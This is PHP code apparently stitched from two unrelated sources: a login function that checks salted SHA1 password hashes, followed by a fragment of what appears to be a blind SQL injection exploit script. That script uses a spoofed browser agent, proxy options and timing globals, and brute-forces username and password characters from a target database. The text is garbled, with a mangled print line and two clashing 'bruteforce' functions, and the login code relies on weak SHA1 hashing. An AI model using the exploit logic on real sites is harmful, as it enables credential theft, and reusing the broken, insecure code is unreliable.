function login_pro($email, $password, $db)
{
if ($query = $db->prepare("Select id,usename,password,salt from login where email=?")) {
$query->bind_param('s', $email);
$query->execute();
$query->store_result();
$query->bind_result($user_id, $username, $p_word, $salt);
$query->fetch();
$password = hash('sha1', $password . $salt);
if ($query->num_rows == 1) {
if (bruteforce($user_id, $db) == true) {
// Account is locked
header('Location: acclocked.php');
} else {
// Check if the password in the database matches
// the password the user submitted.
if ($p_word == $password) {
ins_token($db, $email);
return true;
} else {
// Password is not correct
// We record this attempt in the database
$now = time();
$db->query("INSERT INTO attempts(user_id, time)\n VALUES ('{$user_id}', '{$now}')");
return false;
}
}
} else {
// No user exists.
return false;
}
}
}
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
$xpl->proxy($proxy);
}
if ($proxyauth) {
$xpl->proxyauth($proxyauth);
}
if ($debug) {
debug(1);
}
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
function bruteforce($field)
{
global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
$a = 0;
$v = '';
$dfield = $field;
if (eregi('a', $field)) {
$b = '-1';
$c = '127';
} else {
$b = '46';
$c = '70';
}
# pwd charset